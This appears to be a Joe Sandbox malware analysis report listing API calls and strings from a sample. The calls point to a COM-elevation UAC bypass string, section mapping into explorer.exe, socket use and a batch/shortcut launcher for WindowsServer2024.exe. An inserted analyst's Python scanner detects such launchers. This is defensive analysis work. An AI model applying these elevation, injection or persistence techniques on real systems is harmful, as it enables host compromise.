                                                                            • lstrcpyW.KERNEL32(-00000008,{6EDD6D74-C007-4E75-B76A-E5740995E24C}), ref: 007C1EE6
                                                                            • lstrcpyW.KERNEL32(-00000260,Elevation:Administrator!new:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}), ref: 007C1EFE
                                                                              • Part of subcall function 007CA1B0: GetCurrentProcess.KERNEL32 ref: 007CA1B9
                                                                              • Part of subcall function 007CA1B0: _memset.LIBCMT ref: 007CA1CA
                                                                              • Part of subcall function 007CA1B0: CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,?,00000044,007C2000), ref: 007CA21B
                                                                              • Part of subcall function 007CA1B0: NtCreateSection.NTDLL(00000000,00000006,00000000,?,00000004,08000000,00000000), ref: 007CA251
                                                                              • Part of subcall function 007CA1B0: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000004), ref: 007CA285
                                                                              • Part of subcall function 007CA1B0: NtMapViewOfSection.NTDLL(00000000,00000000), ref: 007CA290
                                                                              • Part of subcall function 007CA1B0: _memmove.LIBCMT ref: 007CA2AF
                                                                            • WaitForSingleObject.KERNEL32(00000000,00001388), ref: 007C1F78
                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 007C1FA9
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C1FB6
                                                                            • CloseHandle.KERNEL32(?), ref: 007C1FC3
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C1FD9
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C1FE9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrcpy$Handle$Process_memset$AddressCloseCreateCurrentProc$DirectoryLocalModuleSection__snwprintf$AllocEventFreeObjectSingleTerminateViewWaitWindows_memmove
                                                                            • String ID: %s\SysWOW64\explorer.exe$%s\explorer.exe$CoGetObject$CoInitialize$Elevation:Administrator!new:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}$ExitProcess$GetProcAddress$IIDFromString$KERNEL32.DLL$KERNEL32.DLL$LoadLibraryW$OLE32.DLL${4042FD4A-C237-4861-80BD-1FA24BEF8CE4}${6EDD6D74-C007-4E75-B76A-E5740995E24C}${F6FB16F6-69D4-4502-9E85-2E5E52F61D5C}
                                                                            • API String ID: 326014250-3343339882
                                                                            • Opcode ID: 355d928985903fa7e3b493e6f5c2ff87237b5c8f1236bff7a262de7406b91668
                                                                            • Instruction ID: 9b5f19603ea33de50665f3bd7dc455fd7371e7a2ea192edad84409bc8f6512d5
                                                                            • Opcode Fuzzy Hash: 355d928985903fa7e3b493e6f5c2ff87237b5c8f1236bff7a262de7406b91668
                                                                            • Instruction Fuzzy Hash: 458165B1A41218ABE720DF64CC49FE97776BB88701F0044DCF609A7282DBB99E95CF54
                                                                            APIs
                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 007CC267
                                                                            • SetEvent.KERNEL32(00000000), ref: 007CC2B2
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007CC2E6
                                                                            • wnsprintfW.SHLWAPI ref: 007CC31C
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007CC32C
                                                                            • lstrcpyW.KERNEL32(00000000,00000000), ref: 007CC353
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007CC379
                                                                            • lstrcpyW.KERNEL32(00000000,{427F0CCF-AF45-4A71-8E02-4FC2A2D64E46}), ref: 007CC39E
                                                                            • CoInitializeEx.COMBASE(00000000,00000006), ref: 007CC405
                                                                            • ShellExecuteExW.SHELL32(<@@), ref: 007CC418
                                                                            • GetLastError.KERNEL32 ref: 007CC424
                                                                            • CoUninitialize.COMBASE ref: 007CC439
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007CC47A
                                                                            • wnsprintfW.SHLWAPI ref: 007CC4B5
                                                                            • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 007CC4FC
                                                                            • OpenEventW.KERNEL32(00100002,00000000,{54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}), ref: 007CC51D
                                                                            • SetEvent.KERNEL32(00000000), ref: 007CC539
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007CC546
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CC553
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CC560
                                                                            • OpenEventW.KERNEL32(00100002,00000000,{54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}), ref: 007CC574
                                                                            • SetEvent.KERNEL32(00000000), ref: 007CC590
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007CC59D
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CC5AA
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CC5B7
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CC5C4
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CC5D1
                                                                            • shutdown.WS2_32(?,00000002), ref: 007CC5DD
                                                                            • closesocket.WS2_32(?), ref: 007CC5E7
                                                                              • Part of subcall function 007CB6D0: CreateDirectoryW.KERNEL32(00000000,00000000), ref: 007CB701
                                                                              • Part of subcall function 007CB6D0: GetLastError.KERNEL32 ref: 007CB70C
                                                                              • Part of subcall function 007CB6D0: LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007CB724
                                                                              • Part of subcall function 007CB6D0: __snwprintf.LIBCMT ref: 007CB74E
                                                                              • Part of subcall function 007CB6D0: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 007CB773
                                                                              • Part of subcall function 007CB6D0: GetLastError.KERNEL32 ref: 007CB77C
                                                                              • Part of subcall function 007CB6D0: LocalFree.KERNEL32(00000000), ref: 007CB7FC
                                                                              • Part of subcall function 007CB6D0: LocalFree.KERNEL32(00000000), ref: 007CB806
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$AllocEvent$CreateErrorLast$CloseHandleOpenlstrcpywnsprintf$DirectoryExecuteFileInitializeProcessShellUninitialize__snwprintfclosesocketsetsockoptshutdown
                                                                            • String ID: "%s%s" %s$%s%s$<@@$@@$D$WindowsServer2024.exe${427F0CCF-AF45-4A71-8E02-4FC2A2D64E46}${54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}${F064C698-006D-4351-BA2C-625A53964F8D}
                                                                            • API String ID: 3249679174-2524385997
                                                                            • Opcode ID: 791efa8af9a31d04fad40b1d73c3db6cb43dd08137f627fc9713dbb1fbafa954
                                                                            • Instruction ID: cba3276ef45f94f57e8b3ba861bc9048bdfad1193a78f154f41ebe342a6eafcb
                                                                            • Opcode Fuzzy Hash: 791efa8af9a31d04fad40b1d73c3db6cb43dd08137f627fc9713dbb1fbafa954
                                                                            • Instruction Fuzzy Hash: 3DA11FB1900218DFEB24DBA4DC49FADBB75BB88701F108999F60DB7291DB785A84CF50
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,?,?,?,?,?,?,?,?,?,007D6AFB), ref: 007D22DD
                                                                            • SHGetKnownFolderPath.SHELL32(007F7BF0,00000000,00000000,?), ref: 007D22FD
                                                                            • __snwprintf.LIBCMT ref: 007D2322
                                                                              • Part of subcall function 007CFE20: SHGetKnownFolderPath.SHELL32(?,00000000,00000000,?), ref: 007CFE74
                                                                              • Part of subcall function 007CFE20: lstrlenW.KERNEL32(?), ref: 007CFE86
                                                                              • Part of subcall function 007CFE20: lstrlenW.KERNEL32(00831110), ref: 007CFE99
                                                                              • Part of subcall function 007CFE20: LocalAlloc.KERNEL32(00000040,?), ref: 007CFEB2
                                                                              • Part of subcall function 007CFE20: __snwprintf.LIBCMT ref: 007CFEDA
                                                                              • Part of subcall function 007CFE20: lstrlenW.KERNEL32(00000000), ref: 007CFEE6
                                                                              • Part of subcall function 007CFE20: CoTaskMemFree.COMBASE(?), ref: 007CFEF5
                                                                            • LocalAlloc.KERNEL32(00000040,00000BB8), ref: 007D234F
                                                                            • __snprintf.LIBCMT ref: 007D237E
                                                                            • SHGetKnownFolderPath.SHELL32(007F7C00,00000000,00000000,?), ref: 007D2396
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007D23AB
                                                                            • __snwprintf.LIBCMT ref: 007D23D5
                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 007D23E3
                                                                            • GetLastError.KERNEL32 ref: 007D23F2
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007D240A
                                                                            • __snwprintf.LIBCMT ref: 007D2439
                                                                            • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 007D245B
                                                                            • WriteFile.KERNEL32(000000FF,00000000,?,00000000,00000000), ref: 007D2487
                                                                            • CloseHandle.KERNEL32(000000FF), ref: 007D2499
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D24C3
                                                                            • CoTaskMemFree.COMBASE(?), ref: 007D24CD
                                                                            • CoTaskMemFree.COMBASE(?), ref: 007D24D7
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D24E1
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D24EB
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D24F5
                                                                            • CloseHandle.KERNEL32(000000FF), ref: 007D250C
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D2516
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D2520
                                                                            • CoTaskMemFree.COMBASE(?), ref: 007D252A
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D2534
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D253E
                                                                            • CoTaskMemFree.COMBASE(?), ref: 007D2548
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D2552
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeLocal$AllocTask$__snwprintf$FolderKnownPathlstrlen$CloseCreateFileHandle$DirectoryErrorLastWrite__snprintf
                                                                            • String ID: %s\%s$%s\%s.lnk$%s\%s\%s.bat$@echo offcmd /c start "" "%S%S" %S$WindowsServer2024.exe${268A4BEB-78DB-4CA2-877B-85BE85A2E24B}${35573C81-0DF9-44C4-B616-731CF1FC3E59}${628E1A37-FDD6-4466-82D3-55913E02016C}${741330C7-73F4-49B6-9258-6679317DED46}
                                                                            • API String ID: 2364451356-3466433328
                                                                            • Opcode ID: 32495dea968131667e85912eddc8bd2626d32db17671140fcb39347983f0935a
                                                                            • Instruction ID: 709e9f842c8134f36a5974face96bc7d237dc82e724e20ea05a18de5aab44c76
                                                                            • Opcode Fuzzy Hash: 32495dea968131667e85912eddc8bd2626d32db17671140fcb39347983f0935a
                                                                            • Instruction Fuzzy Hash: C2716BB5E00309EBDB10DBA4DC4AFAEBB75BB88701F104918F611B63D0DB789941CB60
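Added example (an analyst's helper, not part of the Joe Sandbox report and not the sample's own code): the routine above formats "%s\%s\%s.bat" and "%s\%s.lnk" paths, fills a batch file from the "@echo off" / cmd /c start "" "%S%S" %S template with CreateFileW and WriteFile, and carries the name WindowsServer2024.exe. The Python scan below finds batch launchers of exactly that shape under a directory (a live profile or a mounted image) and reports the launched target. The listing does not show which known folder the two SHGetKnownFolderPath calls resolve (only the data pointers 007F7BF0 and 007F7C00 are visible), so the root directory is a parameter; treating "%S%S" as directory plus file name, the trailing %S as arguments, and the .lnk as sharing the batch file's base name are assumptions, and the sample tree the script builds is constructed for the demonstration.

```python
"""Scan a directory tree for batch-file launchers shaped like the one this routine writes."""
import os
import re
import tempfile
from pathlib import Path
from typing import Dict, List, Optional, Tuple

EXE_NAME = "WindowsServer2024.exe"  # file name string present in the listing above

# Mirrors the template  @echo off  /  cmd /c start "" "%S%S" %S  from the listing:
# the empty "" is the window title that start requires before a quoted path.
# Assumption: %S%S is directory + file name and the trailing %S is an argument string.
LAUNCHER_RE = re.compile(
    r'^\s*cmd\s+/c\s+start\s+""\s+"(?P<target>[^"]+)"(?:\s+(?P<args>.*?))?\s*$', re.I | re.M)
ECHO_OFF_RE = re.compile(r"^\s*@echo\s+off\s*$", re.I | re.M)


def parse_launcher(text: str) -> Optional[Tuple[str, str]]:
    """Return (target, args) if the batch text is an '@echo off' + start-"" launcher, else None."""
    if not ECHO_OFF_RE.search(text):
        return None
    m = LAUNCHER_RE.search(text)
    return (m["target"], m["args"] or "") if m else None


def scan_for_launchers(root) -> List[Dict]:
    """Walk root for *.bat launchers; report target, arguments and whether a matching .lnk exists."""
    hits = []
    for bat in Path(root).rglob("*.bat"):
        try:
            parsed = parse_launcher(bat.read_text(errors="replace"))
        except OSError:
            continue
        if not parsed:
            continue
        target, args = parsed
        name = os.path.basename(target.replace("\\", "/"))
        # The routine formats "%s\%s.lnk" next to "%s\%s\%s.bat": look one level up as well
        # as beside the batch file (assumption: the .lnk shares the batch file's base name).
        lnk_candidates = [bat.with_suffix(".lnk"), bat.parent.parent / (bat.stem + ".lnk")]
        hits.append({
            "bat": str(bat),
            "target": target,
            "target_name": name,
            "args": args,
            "lnk_present": any(p.exists() for p in lnk_candidates),
            "known_name": name.lower() == EXE_NAME.lower(),
        })
    return hits


def build_sample_tree() -> Path:
    """Constructed sample tree for the demonstration, not files from the sandbox run."""
    root = Path(tempfile.mkdtemp(prefix="launcher_scan_"))
    (root / "Updater").mkdir()
    (root / "Updater" / "Updater.bat").write_text(
        '@echo off\r\ncmd /c start "" '
        '"C:\\Users\\user\\AppData\\Roaming\\Updater\\WindowsServer2024.exe" -x\r\n')
    (root / "Updater.lnk").write_bytes(b"L\x00\x00\x00")  # stand-in; shell-link parsing is out of scope
    (root / "backup.bat").write_text("@echo off\r\nxcopy /s C:\\data D:\\backup\r\n")
    return root


if __name__ == "__main__":
    for hit in scan_for_launchers(build_sample_tree()):
        flag = "KNOWN NAME" if hit["known_name"] else "launcher"
        print(f"{flag}: {hit['bat']} -> {hit['target']} {hit['args']} (lnk={hit['lnk_present']})")
```

On a real host, point scan_for_launchers at the user profile (the Startup folder and %APPDATA% are the usual places for this pattern) and treat any launcher whose target does not exist, or whose target sits under a user-writable directory, as worth pulling for triage; the known_name flag only catches this build's file name, the start-"" shape catches renamed copies.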
                                                                            APIs
                                                                            • socket.WS2_32(00000002,00000001,00000006), ref: 007DFFFF
                                                                            • WSACreateEvent.WS2_32 ref: 007E0015
                                                                            • shutdown.WS2_32(000000FF,00000002), ref: 007E04D0
                                                                            • closesocket.WS2_32(000000FF), ref: 007E04DA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateEventclosesocketshutdownsocket
                                                                            • String ID:
                                                                            • API String ID: 3702629066-0
                                                                            • Opcode ID: 9e177c873cce6b7ff2bc361b8b143c808dddfeeef304ee7e77e4b523efad7862
                                                                            • Instruction ID: ba7830024fb15e6a2454efc68be6031411095877d083523de7d6e5f94f2c8b8a
                                                                            • Opcode Fuzzy Hash: 9e177c873cce6b7ff2bc361b8b143c808dddfeeef304ee7e77e4b523efad7862
                                                                            • Instruction Fuzzy Hash: 95F16D74901348EFDF24CFA5D988AADB7B5FF4D310F208959E505A7290D7B89A80DF90
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 007C4C50
                                                                            • _memset.LIBCMT ref: 007C4C6F
                                                                            • _memset.LIBCMT ref: 007C4C8E
                                                                            • SHGetKnownFolderPath.SHELL32(007F7C00,00000000,00000000,?), ref: 007C4CAF
                                                                            • __snwprintf.LIBCMT ref: 007C4CD8
                                                                            • CoTaskMemFree.COMBASE(?), ref: 007C4CE7
                                                                            • _memset.LIBCMT ref: 007C4D06
                                                                            • GetTempPathW.KERNEL32(00000104,?), ref: 007C4D1A
                                                                            • __snwprintf.LIBCMT ref: 007C4D3C
                                                                            • __snwprintf.LIBCMT ref: 007C4D7C
                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 007C4D8D
                                                                            • GetLastError.KERNEL32 ref: 007C4D99
                                                                            • lstrcpyW.KERNEL32(?,?), ref: 007C4DCF
                                                                            • __snwprintf.LIBCMT ref: 007C4DF6
                                                                            • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 007C4E17
                                                                            • GetLastError.KERNEL32 ref: 007C4E2C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: __snwprintf_memset$CreateErrorLastPath$DirectoryFileFolderFreeKnownTaskTemplstrcpy
                                                                            • String ID: "%s"$"%s" "%s"$%s\%s$%s\%s$D$Open
                                                                            • API String ID: 37154465-2887319354
                                                                            • Opcode ID: fb6e90edcded60354a417d8f14662ffe51353b21e720d4d7bdf605dfb8fc5f1e
                                                                            • Instruction ID: d28fe56e62df085ec1506641f1e2af14345b0a9d1b521c31b8d39269589cc851
                                                                            • Opcode Fuzzy Hash: fb6e90edcded60354a417d8f14662ffe51353b21e720d4d7bdf605dfb8fc5f1e
                                                                            • Instruction Fuzzy Hash: 8BA186B1A00318ABDB24DB64CC49FE977B5BB98704F0445DCF609A7181EBB49B94CFA1
                                                                            APIs
                                                                            • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 007CBE96
                                                                              • Part of subcall function 007C1C80: CreateEventW.KERNEL32(00000000,00000001,00000000,{F6FB16F6-69D4-4502-9E85-2E5E52F61D5C}), ref: 007C1CA2
                                                                              • Part of subcall function 007C1C80: _memset.LIBCMT ref: 007C1CCC
                                                                              • Part of subcall function 007C1C80: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 007C1CE0
                                                                              • Part of subcall function 007C1C80: _memset.LIBCMT ref: 007C1D05
                                                                              • Part of subcall function 007C1C80: __snwprintf.LIBCMT ref: 007C1D2F
                                                                              • Part of subcall function 007C1C80: _memset.LIBCMT ref: 007C1D70
                                                                              • Part of subcall function 007C1C80: GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 007C1D84
                                                                              • Part of subcall function 007C1C80: LocalAlloc.KERNEL32(00000040,00000DF0), ref: 007C1DA3
                                                                              • Part of subcall function 007C1C80: GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 007C1DC1
                                                                              • Part of subcall function 007C1C80: GetProcAddress.KERNEL32(?,LoadLibraryW), ref: 007C1DD9
                                                                              • Part of subcall function 007C1C80: GetProcAddress.KERNEL32(?,GetProcAddress), ref: 007C1DF3
                                                                              • Part of subcall function 007C1C80: lstrcpyW.KERNEL32(-000004B8,KERNEL32.DLL), ref: 007C1E14
                                                                              • Part of subcall function 007C1C80: lstrcpyW.KERNEL32(-00000580,OLE32.DLL), ref: 007C1E2B
                                                                              • Part of subcall function 007C1C80: lstrcpyW.KERNEL32(-00000648,00000000), ref: 007C1E42
                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 007CBF0A
                                                                            • SetEvent.KERNEL32(00000000), ref: 007CBF5C
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007CBF90
                                                                            • wnsprintfW.SHLWAPI ref: 007CBFC6
                                                                            • OpenEventW.KERNEL32(00100002,00000000,{54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}), ref: 007CC019
                                                                            • SetEvent.KERNEL32(00000000), ref: 007CC035
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007CC042
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CC04F
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CC05C
                                                                            • shutdown.WS2_32(?,00000002), ref: 007CC068
                                                                            • closesocket.WS2_32(?), ref: 007CC072
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: EventLocal$_memsetlstrcpy$AddressAllocDirectoryFreeHandleProcWow64$CloseCreateCurrentDisableModuleOpenRedirectionWindows__snwprintfclosesocketsetsockoptshutdownwnsprintf
                                                                            • String ID: "%s%s" %s$%s%s$D$WindowsServer2024.exe${54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}${F064C698-006D-4351-BA2C-625A53964F8D}
                                                                            • API String ID: 535781040-1994081684
                                                                            • Opcode ID: 56af2df0d34fcd72fe5fc52096d7fce2260bbe2526f3340ed2eebf36029427de
                                                                            • Instruction ID: 7b20939c024b8def7aec6793d7ba5287db6f756a9083efc91ad9c66ce61bb082
                                                                            • Opcode Fuzzy Hash: 56af2df0d34fcd72fe5fc52096d7fce2260bbe2526f3340ed2eebf36029427de
                                                                            • Instruction Fuzzy Hash: 2F913DB5A00318EFDB24DBA4DC49FAD7775BB88700F1045ACF609A7291DB789A84CF61
                                                                            APIs
                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 007C7603
                                                                            • StrStrIW.SHLWAPI(00000000,.DLL), ref: 007C7813
                                                                            • DeleteFileW.KERNEL32(00000000), ref: 007C783A
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C785B
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C7868
                                                                            • __snwprintf.LIBCMT ref: 007C789D
                                                                            • RegDeleteKeyExW.ADVAPI32(80000001,?,00000200,00000000), ref: 007C78B8
                                                                              • Part of subcall function 007C81C0: LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,007C8D2B,007D6B10,00000000), ref: 007C81EB
                                                                              • Part of subcall function 007C81C0: LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,007C8D2B), ref: 007C8205
                                                                              • Part of subcall function 007C81C0: wnsprintfW.SHLWAPI ref: 007C8235
                                                                              • Part of subcall function 007C81C0: wnsprintfW.SHLWAPI ref: 007C8251
                                                                              • Part of subcall function 007C81C0: LocalFree.KERNEL32(00000000), ref: 007C8A43
                                                                            • StrStrIW.SHLWAPI(00000000,.DLL), ref: 007C7910
                                                                            • DeleteFileW.KERNEL32(00000000), ref: 007C7937
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C7958
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C7965
                                                                            • StrStrIW.SHLWAPI(00000000,.DLL), ref: 007C799A
                                                                            • _memset.LIBCMT ref: 007C79D5
                                                                            • __snwprintf.LIBCMT ref: 007C79F3
                                                                            • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,000F013F,?), ref: 007C7A15
                                                                            • RegDeleteValueW.ADVAPI32(?,00000000), ref: 007C7A2D
                                                                            • RegCloseKey.ADVAPI32(?), ref: 007C7A4D
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C7A5A
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C7A67
                                                                            • shutdown.WS2_32(?,00000002), ref: 007C7AA0
                                                                            • closesocket.WS2_32(?), ref: 007C7AAA
                                                                              • Part of subcall function 007E0CD0: ___crtGetLocaleInfoEx.LIBCMTD ref: 007E0CED
                                                                              • Part of subcall function 007E0950: ___crtGetLocaleInfoEx.LIBCMTD ref: 007E096D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
